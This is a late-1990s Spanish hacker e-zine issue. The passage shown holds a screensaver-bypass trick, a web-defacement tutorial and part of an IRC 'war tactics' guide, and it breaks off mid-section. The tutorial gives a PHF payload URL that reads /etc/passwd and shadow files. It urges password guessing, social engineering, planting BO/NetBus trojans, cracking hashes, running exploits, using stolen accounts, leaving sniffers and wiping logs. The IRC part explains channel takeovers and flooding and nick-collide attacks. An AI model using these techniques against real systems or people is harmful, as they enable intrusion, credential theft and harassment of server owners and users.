************************************************************
*
http://www.angelfire.com/ak/HACKZED/ZED2.html *
************************************************************
------------- |---------| |-----\
|______ / | | | \
/ / | |-----| | \
/ / | | | \
/ / | ---| | |--| |
/ / | ---| | |--| |
/ / | |-----| | |
/ ------- \ | | | /
|_____________| | | | /
|---------| |------/
************************************************************
*
http://www.angelfire.com/ak/HACKZED/ZED2.html *
************************************************************
|--------| |--------| ----------- *** |\ |---||--------|
| | | | |____ /|---|| \ | || |
| ----| | ----| / / | || | | || ----|
| | | | / / | || | | || |
| |--| | |--| / / | || | / || |--|
| --| --------- | --| / / | || |/ || --|
| | /_________\ | | / / | || |\ || |
| ----| | ----| / / | || | \ || -----|
| | | |/ --------\ || | \ || |
|--------| |--------||_____________|- || | ---||---------|
************************************************************
*
http://www.angelfire.com/ak/HACKZED/ZED2.html *
************************************************************
ZeD-wOrLd-EzInE numero 5
colaboradores de este numero:
CheVara----------------->www.geocities.com/SiliconValley/Peaks/7837
DrCyBeR----------------->
http://personales.mundivia.es/pedroj52
Roman Soft-------------->
http://www.esi.us.es/~roman/tacticas.html
saludos desde este e-zine a:
la lista RAREDUDEZZ (de raregazz)
a todos los miembros del HaCk`S-wEb-RiNg (
http://come.to/HaCkS-wEb-RiNg)
a guybrush (de raregazz--
http://raregazz.acapulco.uagro.mx) por publicar ese articulo en tu
e-zine
a la gente de jjf-hackers team (
http://www.jjf.org/)
(felicidades,el nuevo aspecto de la web esta muy currado)
y a toda la gente que colabora y lee este e-zine
si me olvido de alguien,por favor que me perdone,pero mi memoria...(tendre que aumentar la ram)
distribuidores oficiales del e-zine:
http://www.angelfire.com/ak/HACKZED/ZED2.html---->puntero
http://come.to/HaCkS-wEb-RiNg
http://personales.mundivia.es/pedroj52
http://surf.to/zs
si quieres colaborar con el e-zine,mandame tu articulo en formato TXT a
[email protected]
algunos de los textos que aqui se ponen,han sido copiados de webs u otros sitios
pero siempre se respeta el contenido original de los autores y se pone la fuente de
donde han salido.si algun texto es tuyo y no quieres que figure en este e-zine,dimelo
y lo quitare de la edicion.
∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩
sumario de este numero: ∩
1.Editorial (editor) ∩
2.Ampliacion del texto Como trucar el win2 95/98 (ZeD) ∩
3.Como hackear paginas web (CheVara) ∩
4.Tacticas de guerra en el IRC/actualizacion 04/01/99 ∩
(Roman Soft/LLFB)
5.Una introduccion basica al hacking y al underground (stain) ∩
6.Decodificacion de sistemas Nagra Vision (canal+) (ZeD) ∩
7.Tercera parte del curso de antivirus ∩
8.Noticias ∩
9.Despedida y cierre ∩
∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩
((((((((((((((ZeD-wOrLd-EzInE numero 5)))))))))))))))))))))))))))))))))))))))))))))))))))))))))
----------------
1. 3╨1T0«1Σú |
----------------
Bueno en primer lugar,!!!FELIZ NAVIDAD Y PROSPERO 1999 PARA LOS LECTORES DEL E-ZINEííí.
En estas fechas tan se±aladas como son las navidades,en las que si no todos,la mayoria
teneis alguna clase de vacaciones,ya sea por la escuela,en el trabajo....etc....
┐que mejor que entrar al irc un rato a charlar con los colegas,aprender a hacer cosas nuevas
entrar en ese sitio que se te resiste o ponerte a leer cualquiera de los e-zines que se
publican por estas fechas?,pues nada,claro esta y por eso de este temprano numero del
ZeD-wOrLd-EzInE,los que ya lleveis tiempo siguiendolo abreis notado que esta vez a tardado
poco en salir,pero me sentia obligado a hacerlo,mas que nada para felicitar a todos los
lectores asiduos o no tan asiduos a este vuestro e-zine.
Pues lo dicho que el frio aprieta y estareis impacientes por comenzar a activar los
microprocesadores que todos llevamos dentro
(para quien no lo aya pillado,me refiero a las neuronas :D)
-=ZeD=-
((((((((((((((ZeD-wOrLd-EzInE numero 5)))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2. Como trucar el jodio Win2 95/98
Para no aumentar demasiado el tama±o de este numero e decidido poner solo los nuevos trucos
que he descubierto (son para el win12 98).
Si alguno de vosotros quereis el texto completo podeis pedirmelo a:
[email protected]
***************************************************comienza el texto***************************
Si os aveis dado cuenta el windows 98 no es mas que el 95 con la actualzacion del escritorio
que os ofrece el Internet Explorer 4.0 y poco mas,este truco no lo he probado en este sistema
con la actualizacion del escritorio,osea que si alguien lo prueba y le funciona que me lo diga.
El truco en cuestion es para que quede + "fonito" el aspecto de las carpetas,el navegador,el
programa de correo...en fin casi todo que abra una ventana del Gⁿin2.
Vete al regedit (c:\windows) abrelo y haz lo siguiente:
dirijete a HKEY_CURRENT_USER
una vez alli dirijete a software,┐ya?
pues ahora vete a Micro$oft
ahora a Toolbar
una vez que estes aqui crea una nueva cadena con el nombre de BackBitmap
clikea dos veces sobre esta y asignale el nombre de un BMP (no vale otro formato)
que tengas en la carpeta de windows
(para empezar recomiendo Nubes.bmp u otro que se asemeje)
dale a aceptar y todo eso,reinicia el ordenador y abre c:\ ya veras como mola ;-O
El siguiente truco es para saltarse el protector de pantalla
cuando este este activado desde el inicio,si se quiere acceder al Pc en cuestion solo
hay que hacer lo siguiente:
reinicia el PC y en el momento en que entras al win2 manten pulsada la tecla sift asta que
termine de cargar,este metodo es bastante util,ya que al no tener que borrar el acceso a el
nadie se dara cuenta que hemos accedido al PC ;-)
pues esto es todo (de momento) si alguien tiene algun otro truco,que me lo mande a
[email protected]
((((((((((((((ZeD-wOrLd-EzInE numero 5)))))))))))))))))))))))))))))))))))))))))))))))))))))))))
Hackear Paginas WEB:
* Introducci≤n
* Diferencias en los tipos de WEB
* Obteniendo Passwords en el tipo A.
* Obteniendo Passwords en el tipo B.
* Precauciones.
* Sobre el autor
1║ INTRODUCI╙N
El objetivo de este documento es el dar a conocer posibles formas de alteraci≤n del contenido
de una pßgina WEB por personal no autorizado a ello ( llamΘmoslo hacking ;)).
No me hago responsable del uso que se pueda hacer de este documento, pues su ·nica finalidad
es la de informar, y el que lo use para otra cosa... lo hace bajo SU entera responsabilidad...
┐ Queda claro ?, si no te parece bien deja de leer y borra el fichero de tu HD
( disco duro para los muy novatos...).
Las cosas que se describen en este fichero no te aseguran Θxito seguro, probablemente en la
mayorφa de los casos solo te sirvan para empezar, teniendo que improvisar tu, pero prometo
que este doc. serß mejor que los que he visto sobre el tema en Internet.
El nivel de este documento es bßsico, pues no intenta ense±ar todo en un dia, mas que nada
saber como empezar a hacer algo digamos "util".
Nota: A pesar de que podras hacer todo lo que aquφ pone desde Windows 95 o 98, te recomiendo
que pruebes algun Linux (aunque sea el Trinux, que cabe en 3 disketes x┤PPP (www.trinux.org)).
Este documento esta escrito en WORD pk lo tiene todo cristo ( jeje casi todos ilegal para que
se joda Microsoft (con perdon)).
2║ DIFERENCIAS ENTRE TIPOS DE WEBs
Creo que para que nos entendamos mejor, es importante distinguir entre dos clases de WEBs,
las webs personales, que pueden ser modificadas por el usuario propietario mediante su clave
(tipo Geocities, Xoom y los proveedores de acceso a Inet que ofrecen espacio WEB).
El segundo tipo, serian aquellas WEBs, llamemoslas "principales" de un servidor, que solo
pueden ser modificadas por usuarios con muy altos privilegios (llamemosles "root" o
"administrador").
Pues que bien ┐no?, y esta diferenciaci≤n tan chorra... ┐para que vale?... pues la utilizaremos
para diferenciar las formas de hacernos con los passwords que nos dejan modificarlas...
evidentemente no es igual de facil conseguir ser root en un server que tener una cuenta de
usuario... asi que para esto es la diferenciaci≤n.
3║ OBTENIENDO PASSWORDS DE TIPO A (USUARIO):
Estos passwords de usuarios, generalmente no muy cualificados, se caracterizan por ser muy
chorras, osea faciles de recordar, repetidos con los passwords de otras cosas... asi que si
la persona propietaria de las WEB es alguien cercano a ti, puedes empezar provando algunas
palabras que te puedan parecer "interesantes" ( nombre del perro, mujer, hijos, fecha de
nacimiento, lugar de residencia...), pero tampoco te mates mucho provando pues esto es perder
el tiempo muchas veces, asi que si a los 10 o 11 intentos ( seg·n tu paciencia ) no sale nada,
mejor dejes esta forma ;)
Pero tambiΘn seria una buena idea intentar sacar el password a la "victima" a traves de
enga±os y demas ( lo llaman ingenieria social...), por ejemplo puedes ligarte al tio/a y
conseguir que te diga su pass... o tambien puedes intentar meterle un troyano tipo BO o NETBUS,
que te permitiran sacarle las pass, evidentemente no voy a contar aquφ lo que le tienes que
decir a la victima para que te crea... eso tendras que currelarlo tu un pokito
Ademas, si conseguimos el fichero de passwords del servidor... ííEstamos de suerte!! Pues
generalmente los passwords de usuario son bastante fßciles de crackear... solo elige el
usuario y pon el john the ripper a trabajar ( el john es uno de los programas de cracking
de ficheros PASSWD de UNIX mas conocidos, puedes conseguirlo en
www.geocities.com/SiliconValley/Peaks/7837 , si no sabes usarlo... DON┤T WORRY, trae ayuda...)
Pero probablemente el problema no sea el uso del John, sino el conseguir el fichero PASSWD,
asi que para eso vamos al siguiente apartado de este cursillo.
3║ OBTENIENDO PASSWORDS DE TIPO B (root):
Normalmente los administradores de los servidores no se chupan el dedo, asi que conseguir el
fichero o el root directamente a traves de un exploit ( programa que se aprovecha de un BUG o
agujero en el sistema operativo) no sea una tarea facil.
Lo primero que puedes intentar es pillar el passwd por el FTP... y cuando eso no te haya
funcionado probar el PHF ( escribir la siguiente linea en tu navegador:
http://www.host.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd , donde host.com es el
nombre del servidor...), si el phf funcionase ( en estos tiempos ya suele estar parcheado
en casi todos los servidores, asi que si no te sirve no te deprimas), tendrias en tu
pantalla el fichero passwd, pero antes de alegrarte fijate en algo, si aparece:
root:*:0:0:Charlie &:/root:/bin/csh
( un asterisco (*) detrßs del nombre "root" y los dos puntos, tambiΘn puede aparecer una equis
(x)...), querra decir que el fichero esta shadow osea que aparte del PASSWD necesitas otro
archivo... el SHADOW, puedes intentar sacarlo con PHF cambiando la palabra passwd del final
de la linea del PHF por la palabra shadow ( para ser un poco mas explicito puedes jugar con
el phf, cambiando de directorio... supongo que te estaras dando cuenta de c≤mo y si no, hay
va una pista... "etc" es el nombre de un directorio ).
Buiino, si lo anterior no ha funcionado, no te preocupes, a·n tenemos mas bazas que jugar.
Si por cualquier casualidad de la vida posees una cuenta de usuario en el servidor, puedes
intentar hacerte con el passwd ( y con el shadow si hace falta) a traves de telnet ( prueba
con cat o more , para ver si Dios es tu amigo y puedes editar los archivos...) o, puedes
enterarte del Sistema operativo que usa el server, version ... (enterate tambiΘn de la
version del STMP, FTP ...) y vete a buscar exploits ( ya explique antes lo que son exploits...)
Una vez que lo/s tengas pues... los pruebas!!! ┐Sino para que co±o los has cojido?... para
provarlos, primero tendras que compilarlos ( ojo, hay sploits que no hay que compilar, pues
simplemente consisten en teclear unos comandos o algo asi... jeje si tienes algo de
esperiencia seguro que recuerdas algunos viejos compa±eros ;) ).
Un buen sitio para pillar exploits es:
http://www.rootshell.com/
┐ Y donde los compilo ?, pues o el propio server ( con gcc ) o en otro con el mismo SO,
ojo no puedes compilar exploits para un SUN en un linux Red Hat ... una vez que lo tengas
compilado lo ejecutas... y a íjugar!
Despues de todo esto, y otro poco por tu parte seguramente ya tengas root en algun peque±o
server para provar... (recuerda si no tienes mucha soltura... empieza por china o por alli
lejotes... que si te pillan no se meteran mucho contigo ┐verdad?).
4║ PRECAUCIONES
Pues eso... procura no usar cuentas verdaderas para conectar ( aunque piensa que si dejas
huellas... los marrones seran pal due±o de la cuenta, y eso no esta bien..., asi que cuidado
con las cuentas de internet robadas, solo usar las que sepais que el due±o es un verdadero
hijoputa o algo asi... o mejor si usas servidores "intermedios" o borras las huellas con algun
zapper ( si lo usas sastamente como un exploit)... ahh, si te kurrelas un root y tal, pues
deja algun sniffer y eso para recoger la cosecha... ( mas ke na no desperdiciar kurro ya hecho)
5║ SOBRE EL AUTOR
Pues el capullo que escribe todo esto es CHEvARA, individuo que podreis encontrar en el IRC
hispano por #scripting, #hack o #comunistas, cuya WEB por si quieres verla es:
www.geocities.com/SiliconValley/Peaks/7837 y e-mail por si tenes algo que comentar:
[email protected] .
Me he decidido a escribir esto simplemente porque ley un doc sobre el tema tan malo que me
dije... por muy mal que lo haga yo seguro que queda algo mas "util", y aquφ esta, espero que
a alguien le sirva de algo...
CopyRight by CHEvARA ┤98
Saludos para todos mis colegas del IRC y para los demas miembros de GHT.
Si quieres poner este doc. en una web o FTP, por favor avisame ( no pedir permiso, sino
avisar para que me haga ilu y me emociones y todo eso ... x┤P )
((((((((((((((ZeD-wOrLd-EzInE numero 5)))))))))))))))))))))))))))))))))))))))))))))))))))))))))
TACTICAS DE GUERRA EN EL IRC/NUEVA ACTUALIZACION DEL TEXTO-->04/01/99
BY: Roman Soft/LLFB
_______________________________________________________________________________________________
(c) RoMaN SoFt / LLFB, 1998
La distribuci≤n de este documento es "libre", con la ·nica condici≤n de informar al autor en
caso de subirlo a alg·n ftp site o pßgina web, y siempre que no sea con fines comerciales ni
reporte beneficio econ≤mico alguno. Las mismas restricciones se aplican a cualquier otra forma
de difusi≤n p·blica (revistas, news, Θtc). En el caso de publicaciones (revistas) Θsta deberß
ser completamente gratis. El documento debe ser distribuido de forma φntegra, no estß
permitida la modificaci≤n total o parcial ni la difusi≤n de partes aisladas del mismo. En caso
de incumplimiento se emprenderß las acciones legales pertinentes. Contactar con el autor para
cualquier otra modalidad o forma de difusi≤n.
###############################################################################################
0.- Contenido.
1.- Introducci≤n.
2.- Principios.
2.1.- C≤mo funciona una red IRC.
2.2.- Conseguir op sin que nadie te lo de.
2.3.- Otras formas de conseguir op.
2.4.- Bot de servicio.
3.- Ataques.
3.1.- Flood.
3.2.- Nick collide.
3.2.1.- Split server collide.
3.2.2.- Lag collide.
3.3.- Nuke.
3.3.1.- ICMP nuke.
3.3.2.- OOB nuke.
3.4.- Ping.
3.4.1.- Ping of death.
3.5.- Ssping.
3.6.- Teardrop.
3.7.- Land.
3.8.- Teardrop modificado.
3.9.- Smurf.
3.10.- Bonk (/Boink).
3.11.- Syndrop.
3.12.- Overdrop.
3.13.- Nestea (/Nestea2).
3.14.- Trojans.
3.14.1.- Mirc.ini.
3.14.2.- Dmsetup.exe.
3.14.3.- Back Orifice.
3.14.4.- NetBus.
3.15.- Hanson.
3.16.- Modem DoS.
3.16.1.- /Msg ComX.
3.16.2.- +++ATH0.
4.- Spoofing.
5.- TΘcnicas avanzadas.
5.1.- Bouncing.
5.2.- Wingate.
5.3.- DNS Inject.
5.4.- Recursos compartidos.
6.- Defensa.
6.1.- Firewall.
7.- Resources.
8.- Feedback (FAQ).
9.- Agradecimientos.
10.- Modificaciones.
11.- Notas finales.
1.- Introducci≤n.
Ultimamente la guerra en el IRC es, por desgracia, algo bastante com·n. Conviene, a lo menos,
estar informado de las distintas tΘcnicas que se suelen usar para "luchar", aunque sea
simplemente para detectar que te estßn atacando, saber c≤mo lo estßn haciendo e intentar
defendernos. No es mi intenci≤n profundizar demasiado en el tema aunque intentarΘ detallar
algunos puntos que considere convenientes.
Todo lo que aquφ se hable es extensible en general a cualquier red IRC. No obstante en algunos
casos muy particulares me referirΘ a la red IRC hispana ("*.irc-hispano.org"). Ni que decir
tiene que la informaci≤n que se proporciona aquφ es con fines educativos; en ning·n caso debe
ser usada salvo en circunstancias excepcionalmente justificadas. Un uso abusivo puede
significar una k/g-line totalmente merecida. Yo no me hago responsable de un posible mal uso
de esta info.
2.- Principios.
Muchas veces el objetivo de un ataque no es otra cosa que hacerse con un canal ("tomarlo").
Esto es relativamente fßcil y hay diversas tΘcnicas para ello. El objetivo es hacerse con el
op en el canal. Los medios: tu inteligencia y astucia... ;-)
2.1.- C≤mo funciona una red IRC.-
El servidor de IRC propiamente dicho no es mßs que un programa corriendo en background
(un daemon) en una mßquina determinada (en Unix correrφa el "ircd"). Los usuarios se conectan
a dicha mßquina y acceden al servidor en forma de clientes.
Una red IRC se compone de varios servidores corriendo en paralelo y enlazados entre ellos,
de forma que se mantegan comunicados (puedan intercambiar mensajes entre ellos). Cuando un
usuario se conecta a un servidor determinado, Θste (el servidor) lo notifica a los demßs
servidores que forman parte de la red IRC. Igualmente, cualquier otra acci≤n es notificada a
todos los servidores, de forma que Θstos actuan como una unidad. De esta forma el usuario se
deja ver en todos los servidores aunque fφsicamente s≤lo estΘ conectado a uno. Esto permite
tener muchos usuarios repartidos por diferentes servidores pero que virtualmente es como si
estuvieran todos en uno s≤lo.
La estructura de la red IRC es en forma de ßrbol (es decir, no puede haber bucles, o
"caminos cerrados": partiendo de un nodo no se llegue por ning·n camino otra vez a dicho nodo)
aunque un tanto especial: cada nodo se ve a sφ mismo como el nodo raiz de la red y tiene un
grafo en forma de ßrbol que le indica el camino a seguir para alcanzar cada uno de los
restantes nodos. En la "literatura" esto se conoce como "spanning tree", que podrφamos
traducir como "ßrbol de expansi≤n". Esto quiere decir que en un momento determinado un nodo
cualquiera tendrß almacenada informaci≤n para alcanzar cada uno de los otros nodos de forma
unφvoca (tiene un ·nico camino posible hacia cada nodo). Esa informaci≤n serφa el ßrbol que
estß usando el nodo en cuesti≤n. Pero ademßs este ßrbol puede ser distinto para el mismo nodo
en un instante diferente, es decir, puede cambiar (digamos que el nodo va reconfigurßndose).
Esto tiene la ventaja de que permite adaptarse a posibles variaciones (eventuales) de la
topologφa de la red (asφ, si un nodo cae, los restantes nodos lo detectarßn y se reconfigurarßn
de forma que los caminos que antes pasaban por dicho nodo dejen de hacerlo: se tomarφan
caminos alternativos con lo cual la red seguirφa funcionando correctamente a pesar de la caida
del nodo). Un ejemplo de topologφa de red podrφa ser:
[ Server 15 ] [ Server 13 ] [ Server 14]
/ \ /
/ \ /
[ Server 11 ] ------ [ Server 1 ] [ Server 12]
/ \ /
/ \ /
[ Server 2 ] [ Server 3 ]
/ \ \
/ \ \
[ Server 4 ] [ Server 5 ] [ Server 6 ]
/ | \ /
/ | \ /
/ | \______ /
/ | \ /
[ Server 7 ] [ Server 8 ] [ Server 9 ] [ Server 10 ]
:
[ etc. ]
:
El paso de un nodo a otro adyacente se conoce como "hop" (salto). Asφ para alcanzar el nodo 5
partiendo de 4 tendremos que dar 2 saltos (hops): uno de 4 a 2 y otro de 2 a 5.
Podemos visualizar el ßrbol que estß usando el server al que estamos conectados usando el
comando "/links". Este sacarß un listado por pantalla de los servidores alcanzables desde el
nuestro, de forma jerarquizada, es decir, respetando la estructura del ßrbol. Normalmente se
indica entre parΘntesis al lado de cada servidor el n·mero de hops que habrφa que dar para
alcanzar cada uno de los nodos partiendo del nuestro.
Cuando se rompe uno de los eslabones (links) que unen 2 servidores el conjunto se divide en 2
subconjuntos, los cuales intentarßn seguir funcionando normalmente aunque de forma aislada.
Esto es, cada subconjunto permanece operativo y mantiene la comunicaci≤n entre los servers
pertenecientes a dicho subconjunto. Pero por razones obvias los servidores de un subconjunto
no ven a los del otro y viceversa. Esta situaci≤n se conoce como net-split.
En una sesi≤n normal de IRC esto lo verφamos:
[1:23] *** Case_Zer0 has quit IRC (fuego.irc-hispano.org io.irc-hispano.org)
Esto indica que se han spliteado los dos servidores indicados entre parΘntesis y que a
consecuencia de ello el usuario Case_Zer0 [ hi Case ;-) ] ha salido "de nuestra red IRC"
(lo que estß ocurriendo es que se encuentra en el otro subconjunto de servidores: a todos
los efectos es que como si se encontrase ya en otra red IRC).
Cuando el enlace caido se recupera (i.e. se reestablece la comunicaci≤n entre los servers
spliteados) se habla de net-merge. Esto se verφa en la sesi≤n anterior como un "join" por
parte del usuario que estaba en el servidor spliteado (tanto el quit como el join anteriores
son mecanismos del propio IRC, es decir, el usuario anterior no dio ninguna orden de quit ni
de join, es transparente a dicho usuario).
Hay programas que detectan y avisan cuando se produce alg·n net-split o net-merge: son los
denominados "link-lookers", y su utilidad es bastante obvia.
Por ejemplo, si el enlace dibujado en rojo (enlace server 2 <-> server 5) cayera, el servidor
5 estarφa aislado de la red. Los usuarios de dicho servidor dejarφan de ver a todos los demßs
pertenecientes a servidores distintos, y al contrario. Se dice que el servidor 5 estß spliteado.
Es fßcil reconocer a un servidor en esta situaci≤n: si entras en una red a travΘs de un
determinado servidor y te encuentras a muy poca gente es muy normal que se deba a que estß
spliteado de la red.
Otra posibilidad es que el enlace azul (3 <-> 12) cayera. En este caso el servidor 12 se
splitea de la red, pero tambiΘn lo hacen los servidores 13 y 14 indirectamente, por conectarse
a travΘs del primero.
Para una informaci≤n completa del funcionamiento y estructura de una red IRC, y del protocolo
subyacente ("Internet Relay Chat Protocol") os remito al RFC1459 .
2.2.- Conseguir op sin que nadie te lo de.-
Cuando alguien se une a un canal donde no hay nadie (hace un /join #canal) el servidor supone
que se trata de un nuevo canal y le da op a dicho usuario. Se dice que ha creado un canal.
Vamos a aprovechar esto para hacernos con el op en un canal ya existente. ┐C≤mo? Fßcil: solo
hay que aprovechar un net-split. Los pasos serφan los siguientes:
- Esperar un split (lo podemos detectar con un link-looker).
- Entrar (conectar) al servidor spliteado.
- /join #canal (donde canal es el canal donde queremos conseguir op).
- El server crearß un nuevo canal y tendrßs el op.
- Esperar a que se deshaga el split.
Si "hay suerte" (leer mßs abajo), al deshacerse el split conservaremos el op en los restantes
servidores (el servidor spliteado se encarga de dar las ≤rdenes correspondientes). Entonces se
dice que hemos llevado a cabo un "net-hack". Los usuarios presentes en el canal en el que
hemos llevado a cabo la acci≤n verßn algo como:
[1:41] *** irc.i3d.es sets mode: +o RoMaNSoFt
(donde el servidor que nos da op es el que antes estaba spliteado).
Esto no siempre funcionarß porque hay aspectos que todavφa no he comentado. Paso a explicar el
procedimiento y comentar algunos puntos negros. Supongo que habrΘis comprendido el
procedimiento; es muy simple: aprovechar que el servidor spliteado no ve a los usuarios de
otros servidores y por tanto al canal previamente creado. Esto presupone que no hay usuarios
del servidor spliteado en el canal (en este caso no funcionarφa) ya que al entrar nosotros por
el server spliteado verφamos al canal como ya creado, con los usuarios de nuestro mismo
servidor (a los otros los "esconde" el split) y por tanto el server no nos darß el op, como es
habitual al entrar en cualquier canal ya existente.
TambiΘn hay que tener en cuenta que actualmente todos los servidores tienen protecciones
anti-nethack. En este caso, al deshacerse el split, los restantes servidores te quitarßn el
op a tφ en vez de ser al contrario (imponer tu op en los restantes servers), protegiendo al
canal PERO Θsto lo harßn ·nicamente en caso de que ya hubiera ops en el canal antes de tu
intento de net-hack (aunque hay veces en que el server se equivoca y mantiene tu op,
quitßndoselo a los demßs). Es decir, que el net-hack funcionarß s≤lo para canales donde no
haya op ("opless channels"). Por esta raz≤n, si queremos el op, necesitaremos tirar
previamente a los ops (echarlos del canal, de forma que pierdan su op) para luego llevar a
cabo el net-hack. ┐C≤mo tirarlos? De esto nos encargaremos mßs adelante, sigue leyendo };-)
2.3.- Otras formas de conseguir op.-
La otra alternativa para conseguir el op es que alguien te lo de ;-) . Puede ser un op del
canal o un irc-op de la red, aunque para esto ·ltimo tendrßs que dar una justificaci≤n
convincente (como por ejemplo que os acaban de tomar el canal, alguien os ha atacado, Θtc).
Para la primera alternativa entra en juego tu "don de la palabra": trata de hacerte amigo de
alg·n op para que Θste te lo pase. En ese momento ya estßs capacitado para quitarle el op a
todos los demßs ("mass-deop") y quedarte con el canal. Esto lo hacen automßticamente muchos
scripts ("automatic-deop"): nada mßs darte el op el script automßticamente deopea a todos los
ops (excepto a tφ, claro).
2.4.- Bot de servicio.-
Se trata de un "usuario" muy especial... un robot que se encarga entre otras cosas de proteger
los canales. En la red hispana se llama Scytale (en CobraNet, por ejemplo, es KingCobra) y
estß dentro de muchos canales (registrados). Normalmente suele tener op, con lo cual el canal
deja de ser opless y se evita el net-hack :-( Suele tener ircop-status [channel-service status]
y ademßs tiene otras funciones en las que no pienso entrar. Resumiendo: si hay bot, nuestro
gozo a un pozo.
3.- Ataques.
En esta secci≤n entraremos en materia... }:-) Nuestro objetivo: tirar a alguien del server irc.
3.1.- Flood.-
Los servidores IRC tienen que controlar el trßfico de entrada (el que proviene del exterior)
para evitar su congesti≤n. Una de las formas de conseguirlo es no permitir que un cliente le
mande mßs de una determinada cantidad de informaci≤n en un peque±o intervalo de tiempo; o lo
que es lo mismo: la velocidad con que un cliente puede enviar datos al servidor estß limitada.
Cuando un cliente supera el lφmite preestablecido por el servidor, Θste cierra la conexi≤n con
el cliente: lo echa del servidor porque no puede soportar tanto caudal de entrada. El servidor
lo "explica" asφ:
[1:59] *** _^TkLaS^_ has quit IRC (Excess Flood)
Un flood, en general, no es otra cosa que mandar mucha informaci≤n en poco tiempo a alguien
para intentar que se sature. Se puede floodear una direcci≤n IP, ..., o lo que ahora nos
concierne: un servidor de IRC.
La manera de aprovechar el flood en nuestro favor consiste en mandar muchas peticiones de
informaci≤n a nuestra vφctima, de forma que Θsta, al contestar, supere el lφmite del servidor
y Θste lo eche. Por ejemplo, si le mandamos muchos /ctcp version's seguidos (requiriendo
informaci≤n sobre el programa cliente que estß utilizando) la vφctima floodearß al servidor
cuando conteste porque mandarß muchas veces (tantas como peticiones haya habido) el texto de
respuesta al servidor (para que del servidor vaya al cliente que peticion≤, i.e., al atacante).
En esto del flood juega un papel muy importante el n·mero de peticiones que se reciben en un
peque±o intervalo de tiempo. Cuantas mßs se reciban, mßs posibilidades hay de que el flood
tenga Θxito. Por ello no es ninguna tonterφa mandar peticiones desde varios puntos a la vez,
y no desde uno s≤lo, es decir, varios usuarios (íque podrφan ser una misma persona!) de la red
IRC manden peticiones a la vφctima todos a la vez en un determinado momento. Si los usuarios
(nicks) corresponden a una misma persona (una misma direcci≤n IP) se habla de clones. Por
tanto, una posible forma de ataque serφa crearnos muchos clones y peticionar a la vez desde
todos ellos a la vφctima.
Pero los servidores tambiΘn suelen estar preparados para evitar muchos clones
(cada clone ocupa, por decirlo de alguna manera, una "linea" de entrada al servidor, y esto
consume recursos del mismo). Suele haber un mßximo permitido (en el irc hispano es 2)
denegßndosele el acceso a la red a un tercer clone, o en caso de que Θste lo consiguiese
expulsßndosele del servidor ("matßndolo") (el programa servidor revisa peri≤dicamente las
IP's conectadas y detecta cuando hay varios usuarios con una misma direcci≤n IP):
[1:32] *** _^Virus^_ has quit IRC (Killed (Clones!))
Se puede cambiar el n·mero mßximo de clones admisibles desde una determinada direcci≤n IP o
dominio a±adiendo una I-Line al servidor IRC (en caso de no existir I-Line para esa direcci≤n
IP en particular se usa el mßximo genΘrico definido). Esto lo debe hacer alg·n administrador
de la red IRC y es lo que habitualmente se usa para dar acceso a entidades con muchos
ordenadores accediendo a Internet desde una misma IP (como es el caso de la mayorφa de
cyber-cafΘs).
┐C≤mo provocar un flood con mßs de 2 clones entonces? La respuesta es simple: en principio
no se puede. ┐Entonces? Pues la soluci≤n es que varias personas distintas se pongan de acuerdo
para atacar a la vez a la vφctima. Cada persona podrφa tener a su vez varios clones. Por
ejemplo, si A (atacante) quiere atacar a V (vφctima), A se pone de acuerdo con B y C
(otras 2 personas atacantes). A su vez supongamos que cada atacante tiene 2 clones: i.1 e i.2
(donde i=A,B,C). Entonces tendremos 6 usuarios (conexiones IRC) distintos atacando a V,
que serφan A.1, A.2, B.1, B.2, C.1 y C.2. Pero hay un problema: ┐c≤mo sincronizarse para
atacar? ┐C≤mo "ponerse de acuerdo" para mandar las peticiones en un determinado momento?
Para esto existe lo que se denomina "floodnet" que, como habrß adivinado nuestro ßvido lector,
es una "red" (asociaci≤n) de gente cuyo ·nico objetivo es floodear a alguien. La ventaja que
tiene es que la sincronizaci≤n entre los distintos componentes de la floodnet es automßtica
(lo hacen los scripts) lo cual resuelve el problema anterior. TambiΘn existe lo que se
denomina "botnet" y que es anßlogo a la floodnet pero usando bots (no confundir con los
"de servicio"; estos ·ltimos los ponen los servers de la red irc y no los usuarios) los
cuales serßn lanzados desde alguna shell Unix (intΘrprete de comandos en una mßquina Unix).
Los bots suelen estar prohibidos y cuando se detectan, a lo menos, son expulsados:
[1:32] *** Viernes13 has quit IRC (Killed (You are not welcome to this network!))
Hoy en dφa tanto los programas clientes de IRC como los scripts implementan protecciones
anti-flood que dificultan enormemente el Θxito de un ataque de tipo flood. Por ejemplo,
cuando detectan varias peticiones seguidas mandan las respuestas espaciadas en el tiempo
(con pausas) y no inmediatamente, con lo cual se evita el flood.
TambiΘn hay tΘcnicas de flood bastante optimizadas (por ejemplo, usando una floodnet)
aunque en general un ataque flood no suele ser demasiado eficiente y es mßs costoso lograr su
Θxito que con algunas de las tΘcnicas que se describen a continuaci≤n.
3.2.- Nick collide.-
Un "nick collide" ocurre cuando dos personas tienen un mismo nick. En principio esto no
deberφa ser posible (el servidor no deja usar un nick que ya estß en uso) pero hay dos
situaciones en las que podrφa darse el caso y que se describen en los dos puntos siguientes.
El resultado de un nick collide depende del servidor (ircd). En servidores antiguos
(sin protecci≤n) el collide se resuelve matando a los dos usuarios con mismo nick (íambos!).
En otros mßs inteligentes (con protecci≤n) el servidor guarda informaci≤n acerca de los
usuarios y puede saber que usuario tiene el nick con mayor antigⁿedad
(i.e. quiΘn se lo puso antes), matando ·nicamente al usuario con el nick mßs reciente
(protegiendo al usuario mßs "veterano").
3.2.1.- Split server collide.-
Se basa en aprovechar un net-split:
- Esperar un split.
- Entrar (conectar) al servidor spliteado.
- Ponerse como nick el de la vφctima.
- Esperar a que se deshaga el split.
Si todo va bien (el servidor no tiene protecci≤n), a la vuelta del split se detectarß el
collide y se matarßn tanto al atacante como a la vφctima. L≤gicamente nuestro usuario
atacante serß un clone nuestro, con lo cual no pasa nada si es killeado.
3.2.2.- Lag collide.-
Consiste en aprovechar el lag de un servidor, o lo que es lo mismo, el retraso en recibir
